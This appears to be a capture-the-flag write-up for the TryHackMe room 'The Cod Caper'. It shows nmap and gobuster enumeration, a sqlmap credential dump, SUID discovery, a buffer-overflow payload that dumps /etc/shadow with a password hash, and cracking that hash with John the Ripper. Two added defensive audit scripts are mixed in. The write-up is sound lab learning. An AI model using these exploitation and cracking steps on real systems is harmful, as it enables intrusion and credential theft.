
The Cod Caper (WU)

In this blog post, I’ll cover The Cod Caper, a box from THM which claims to be for beginners. We’ll see step by step how to solve it. I highly recommend you do it before reading this post.

This write-up is intended mainly for those who have already finished this box. However, you can have a quick look at it if you’re totally lost.

This box can be found at (login required) : https://tryhackme.com/room/thecodcaper

The Cod Caper banner from TryHackMe.
Credit: TryHackMe

I – Host enumeration

For this part, I’m using this command:

nmap -p 1-1000 -sV -sS <ip>

-p 1-1000 => Scan only the first 1000 ports

-sV => Get the services’ versions (as we’re blind for now, I expected to find a vulnerable service with a known CVE)

-sS => Perform a SYN (stealth) scan

Here is the output of the scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 18:40 CEST
Nmap scan report for 10.10.212.142
Host is up (0.029s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds

From this output, we have all the information needed to answer the three following questions:

Question 1

We have 2 ports open on this machine: 22 & 80

Question 2

The webpage’s (http:///index.html) title is “Apache2 Ubuntu Default Page: It works”

Question 3

The SSH version is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

II – Web Enumeration

For this part, I used gobuster, as suggested, since dirb only enumerates directories, not files.

gobuster dir -x php,txt,html --wordlist /usr/share/wordlists/dirb/big.txt --url <ip>

Please note that the path I’m using here only works for the Kali distro. You may need to download it manually if your distro doesn’t come with it natively.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.212.142
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2020/04/08 18:48:50 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.html (Status: 403)
/administrator.php (Status: 200)

I stopped the scan as soon as I saw the administrator.php file: I knew it was the ‘important file’ of the server.

III – Web Exploitation

As I knew there wouldn’t be many records in the database, I didn’t use the --all flag.

So my exploitation command was:

sqlmap -u <ip>/administrator.php --forms --dump

Then the 2 credentials appear… magically :p.

IV – Command Execution

Firstly, I want to say a big thanks to Psyrkoz#0405 & MuirlandOracle#2721 who helped me debug this. In fact, this part took me the most time on the whole box.

At a glance, I think everyone would use this command :

find /* -user pingu

But there are many other users on the box, and here www-data is our candidate!

find /* -user www-data

returns

/var/hidden/pass

on its last line, which clearly shows us the way to go!

V – LinEnum

To ‘inject’ LinEnum into the system, I resorted to a rough and raw solution (that I don’t recommend, even though I used it): copy/paste the content of linenum.sh through an SSH session (now that we have pingu’s SSH password, let’s use it!).

Then I ran this command :

chmod +x ./linenum.sh
./linenum.sh | grep SUID -A30

And as a part of the output, we find this :

[-] SUID files:
-r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount

As we can see, the first line looks pretty… unusual, and it is: it’s the answer to this part!
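The reason /opt/secret/root jumps out of the SUID list above is its location, and that check can be automated. The following script is an added example, not part of the write-up or of LinEnum: it reads ls -l style lines (the format LinEnum prints) and flags SUID files outside the directories where packages normally install them; the EXPECTED_DIRS list is my assumption for a stock Ubuntu box.

```shell
# Added example, not from the write-up: among the SUID files LinEnum lists, flag
# the ones living outside the directories where distro packages normally install
# SUID binaries. On this box that is exactly what makes /opt/secret/root stand out.

# Where a SUID binary is expected on a stock Ubuntu install (assumption: adjust per distro).
EXPECTED_DIRS='/bin /sbin /usr/bin /usr/sbin /usr/lib /usr/libexec'

# Read "ls -l"-style lines on stdin and print the path of each regular file
# whose directory is not under one of EXPECTED_DIRS.
flag_unusual_suid() {
    awk -v dirs="$EXPECTED_DIRS" '
        BEGIN { n = split(dirs, d, " ") }
        $1 ~ /^-/ {                      # mode string of a regular file
            path = $NF; ok = 0           # the path is the last field
            for (i = 1; i <= n; i++)
                if (index(path, d[i] "/") == 1) { ok = 1; break }
            if (!ok) print path
        }'
}

# Live check on the current host (no root needed: unreadable dirs are skipped).
audit_host() {
    find / -xdev -type f -perm -4000 -exec ls -l {} + 2>/dev/null | flag_unusual_suid
}

# Constructed sample: three lines quoted from the LinEnum output above.
SAMPLE='-r-sr-xr-x 1 root papa 7516 Jan 16 21:07 /opt/secret/root
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping'

demo_sample() {
    printf '%s\n' "$SAMPLE" | flag_unusual_suid     # prints only /opt/secret/root
}
```

On a real host, follow up each flagged path with `dpkg -S <path>`: a SUID file that no package claims deserves a closer look.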

VI – Binary Exploitation

I chose to go through the manual version of this part, so I won’t cover the Python part. In fact, the room’s explanation is already a write-up for it.

After playing a bit with gdb, it looks like our padding has to be 44 chars (the 44 ‘A’s below, placed right before the return address). Even though the room states it, I really encourage you to (re)discover it by yourself.

Then, to reach the shell function, I just pasted the Python command they give us:

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root

Which gives us an output like this:

daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18277:0:99999:7:::
uuidd:*:18277:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::

VII – Password Cracking

I used John the Ripper (as I’m used to it) and the command looks something like this (papa’s hash starts with $1$, which is md5crypt, so that’s the format to pass; John would also detect it on its own):

john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt papa.hash

And there you are: root’s password is owned!
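Picking the right John format starts with reading the crypt(3) prefix of the hash, and the same check is what a defender runs to find accounts still on a legacy hash. The script below is an added example, not from the write-up: it classifies each /etc/shadow line by its prefix, using two lines quoted from the dump above plus one constructed locked entry as sample input.

```shell
# Added example, not from the write-up: classify each /etc/shadow entry by its
# crypt(3) prefix. This tells you which John format to use (papa's hash starts
# with $1$, i.e. md5crypt) and, from the defender's side, which accounts still
# rely on a legacy hash that should be migrated to sha512crypt or yescrypt.

# Read shadow-format lines on stdin, print "<user> <algorithm>" per line.
shadow_audit() {
    awk -F: '
        # map the hash prefix to the algorithm name John uses for it
        function algo(h) {
            if (h == "")               return "EMPTY"     # no password at all
            if (h ~ /^[*!]/)           return "locked"    # "*" or "!...": no password login
            if (h ~ /^[$]1[$]/)        return "md5crypt"
            if (h ~ /^[$]2[aby][$]/)   return "bcrypt"
            if (h ~ /^[$]5[$]/)        return "sha256crypt"
            if (h ~ /^[$]6[$]/)        return "sha512crypt"
            if (h ~ /^[$]y[$]/)        return "yescrypt"
            return "unknown"
        }
        NF >= 2 { print $1, algo($2) }'
}

# Only the accounts a hardening check cares about: weak, missing or unrecognised hash.
weak_accounts() {
    shadow_audit | awk '$2 == "md5crypt" || $2 == "EMPTY" || $2 == "unknown" { print $1 }'
}

# Constructed sample: two lines quoted from the dump above plus one "!"-locked
# entry with a placeholder hash (not a real value from the box).
SAMPLE='www-data:*:17953:0:99999:7:::
papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7:::
pingu:!$6$placeholder:18277:0:99999:7:::'

demo_audit() {        # on a real host: sudo cat /etc/shadow | shadow_audit
    printf '%s\n' "$SAMPLE" | shadow_audit
}

demo_weak() {
    printf '%s\n' "$SAMPLE" | weak_accounts     # prints only papa
}
```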

VIII – Conclusion

I found this box pretty easy, even if I got stuck on the command execution part. A good complement for it would be Vulnversity, which has the same approach for beginners. By the way, if you found any error or have any improvement to share about this write-up, I’m waiting for your PRs :p